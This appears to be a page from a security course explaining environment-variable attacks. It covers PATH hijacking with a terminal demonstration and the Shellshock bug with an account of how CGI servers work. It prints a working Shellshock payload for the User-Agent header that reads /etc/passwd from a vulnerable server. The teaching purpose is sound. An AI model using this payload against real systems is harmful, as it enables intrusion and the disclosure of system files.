Analysis and Exploration of Vulnerabilities

Environmental Variables

Command execution is affected by environmental variables.

  • They are not present in the command line executed, just exist in the current context.

In other words: commands process environmental variables.

  • Controlling environmental variables may provide control over a program.

Examples

The PATH variable contains a list of folders, which are searched when a command is issued.

If PATH=“/bin;/sbin;/usr/bin;/usr/sbin”, system(“ls”) will lead to bash searching for ls in those folders.

If an attacker controls PATH it may make an application call a different binary.

host:/sec$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
host:/sec$ ls -al
drwxr-xr-x 1 user user   4096 Nov 5 23:36 .
drwxrwxrwt 1 root root   4096 Nov 5 23:39 ..
-rwxr-xr-x 1 user user 455584 Nov 5 23:36 ls
host:/sec$ export PATH=/sec
host:/sec$ ls -la
Evil code here!

CVE-2014-6271 - Shellshock

Summary: Bash executes code present after the declaration of a function placed on an environmental variable

env ‘FUNCTION()=() { :; } echo “Bad code” ’

Will result in executing echo “Bad code”.

  • Issues seems to be innocuous as an attacker that calls env could call other command directly.

But... Some servers create env variables based on user content.

CGI: Common Gateway Interface.

  • Simple way of executing scripts that interact with clients through a web server

Operation:

  1. Server receives a request.

  2. Server creates environmental variables with the request content.

    1. URL parameters

    2. REQUEST body

    3. ALL HTTP HEADERS!

  3. Server executes the script.

    1. If script uses bash at any point (e.g. Perl script that uses system), environmental variables may be executed.

  4. Server returns the output to the client as the HTTP Response Body.

    1. There are ways of returning headers also.

User-Agent: () { :;}; echo "passwd: " $(</etc/passwd)

The User-Agent HTTP Header is converted into a ENV Variable.

Bash will execute the echo command with the content of the /etc/passwd file.

  • Output will be sent to clients as the response body.

PreviousGTFOBins and LOLBASNextParameter Expansion

Last updated